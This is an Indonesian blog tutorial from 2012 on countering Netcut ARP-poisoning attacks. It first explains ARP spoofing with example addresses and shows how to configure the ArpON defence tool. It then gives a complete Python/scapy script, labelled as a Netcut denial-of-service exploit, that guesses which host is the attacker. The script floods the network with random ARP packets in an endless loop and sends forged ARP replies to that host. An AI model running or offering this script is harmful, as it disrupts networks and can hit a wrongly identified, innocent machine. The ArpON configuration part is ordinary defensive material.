Please Enable JavaScript Your Browser.. Thank's

Kamis, 12 April 2012

Counter Attack Net Cut

Disini saya menggunakan Backtrack 5 yang sudah kumplit aplikasi untuk yang aneh-aneh... mungkin pengunjung sudah tidak aneh lagi mendengar Operating Sistem ini yang termasuk distro Ubuntu 10.04 version Gnome, Nah sekarang saya membahas sedikit tentang Konsep Net Cut dan cara menangkal ataupun membalas agar Komputer si Net Cut Over memory di RAMnya:

1. Net Cut:

Net cut menurut konsep pemahaman saya dari banyak literatur video, searching maupun buku, mengatakan bahwa Net Cut menggunakan konsep ARP-Poisoning, dimana Mac Gateway si Komputer Korban agar berbeda dengan gateway defaultnya.

Misal:

Gateway Internet Asli:

192.168.6.1 dengan Mac: 00:00:cd:0c:7b:ae

Kompi Korban awalnya:

192.168.6.20 dengan Mac 00:26:82:22:ae:oc dan Mac Gateway: 00:00:cd:0c:7b:ae

Kompi Penjahat mencoba racuni Kompi Korban:

Penjahat: 192.168.6.21 dengan Mac 48:af:28:11:ae:cd dan Mac Gateway 00:00:cd:0c:7b:ae

Kompi Korban saat terinfeksi oleh Kompi si Penjahat:

192.168.6.20 dengan Mac 00:26:82:22:ae:oc dan Mac Gateway milik penjahat ataupun random: 48:af:28:11:ae:cd ---> berbeda dengan Gateway Defaultnya yang: 00:00:cd:0c:7b:ae

2. Arpon

Untuk aplikasi yang satu ini biasanya (saya) gunakan di Backtrack 5 ataupun distro linux ubuntu pada umumnya dengan cara menginstall lewat terminal dengan server lokal ataupun luar:

Catetan kalo selain Backtrack gunakan perintah sudo untuk mengeksekusi sebagai root.

apt-get install arpon

Setelah terinstal kita setting lagi sedikit agar dapat berjalan:

1. gedit /etc/arpon.sarpi

Tambahkan IP dan Mac Gateway (Sebelum terinfeksi) tanpa tanda pagar karena tanda # untuk komentar

Misal:
#IP_Gateway
192.168.6.1 00:00:cd:0c:7b:ae

Lalu save

2. gedit /etc/default/arpon

Lihat script dibawah:

# For SARPI uncomment the following line
#DAEMON_OPTS="-d -f /var/log/arpon/arpon.log -g -s"

# For DARPI uncomment the following line
#DAEMON_OPTS="-d -f /var/log/arpon/arpon.log -g -y"

# Modify to RUN="yes" when you are ready
RUN="no"

Rubah jika Mode Static Hilangkan tanda # Daemon untuk SARPI jika tipe Dynamic hilangkan tanda # Daemon untuk DARPI.

Menjalankan arpon:

Lihat dahulu mode apa yang digunakan (Interface)
1. Eth = LAN
2. Wlan = Wireless

Contoh saya menggunakan interface Wlan0:

arpon -i wlan0 -y

(catetan: saya terkoneksi dengan tipe dynamic Mode DARPI jadi menggunakan perintah akhir -y apabila menggunakan SARPI tinggal rubah perintah akhir dengan -s)

3. Anti Net-Cut 2.0:
#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Version: Netcut 2
#Tested on: Windows Xp, Windows 7

from scapy.all import sniff, Ether, ARP, RandIP, RandMAC, Padding, sendp, conf
import commands, os, sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip = commands.getoutput("ip route list | grep default").split()[2]
    
def protect(gw_ip, gw_mac):
    os.popen("arp -s %s %s" % (gw_ip, gw_mac))
    print "Protected From Terrorist"
    
def detect():
        ans = sniff(filter='arp', timeout=7)
        target = []
        for r in ans.res:
            target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
        return target

def preattack(gw_ip):
    flag = 0
    num = []
    count = 0
    target = 0
    temp = 0
    print "Searching Terrorist..."
    d = detect()
    for i in range(len(d)):
        if d[i].split()[0] == "255.255.255.255":
            num.append(d.count(d[i]))
            if d.count(d[i]) > count:
                count = d.count(d[i])
                target = i
        if d[i].split()[0] == gw_ip:
            temp += 1
    if len(d) < 7:
        print "[-] No One Terrorist..."
        exit()
    if len(num) * 7 < temp:
        num[:] = []
        count = 0
        result = float(temp) / len(d) * 100
        for j in range(len(d)):
            if d[j].split()[0] == gw_ip:
                if d.count(d[j]) > count:
                    count = d.count(d[j])
                    target = j
            result = float(temp) / len(d) * 100
        flag = 1
    else:
        num.reverse()
        result = float(num[0] + temp) / len(d) * 100
    print "There is a possibility that " + str(result) + "%"
    if result >= 50:
        target_mac = d[target].split()[1]
        target_ip = d[target].split()[2]
        print "[+] Detected Terrorist Location Protocol Cyber %s MAC %s" % (target_ip, target_mac)
        if flag == 0:
            attack(target_mac, target_ip, gw_ip)
        else:
            print "[-] Can't Attack"
    else:
        print "[-] No one Terrorist or try again"

def attack(target_mac, target_ip, gw_ip):
    print "[+] Counter Attack of Fire in The Hole !!!"
    e = Ether(dst="FF:FF:FF:FF:FF:FF")
    while 1:
        a = ARP(psrc=RandIP(), pdst=RandIP(), hwsrc=RandMAC(), hwdst=RandMAC(), op=1)
        p = e / a / Padding("\x00"*18)
        sendp(p, verbose=0)
        a1 = ARP(psrc=gw_ip, pdst=target_ip, hwsrc=RandMAC(), hwdst=target_mac, op=2)
        p1 = e / a1 / Padding("\x00"*18)
        sendp(p1, verbose=0)
        
if __name__ == '__main__':
    os.system("clear")  
    if len(sys.argv) == 2 or len(sys.argv) == 3:
        if len(sys.argv) == 2:
            conf.iface = sys.argv[1]
            preattack(gw_ip)
        if len(sys.argv) == 3:
            conf.iface = sys.argv[1]
            gw_mac = sys.argv[2]
            protect(gw_ip, gw_mac)
            preattack(gw_ip)
    else:
        print '''Mode:
1.)Attack only Terroris
Usage: NetcutKiller
Example: NetcutKiller.py wlan0
2.)Attack with protect himself From Terroris
Usage: NetcutKiller
Example: NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
''' 

Simpan misal Pembalasan_Netcut.py simpan di root (home)

(Catetan: bahasa yang digunakan menggunakan bahasa pemograman python jadi ekstensi akhir berikan .py)

Lalu untuk menjalankannya Lewat terminal:

python Pembalasan_Netcut.py

Lalu akan muncul pilihan.

Have Fun ^^.. mohon maaf apablia ada yang kurang dalam tutorial ini.

0 comments:

Posting Komentar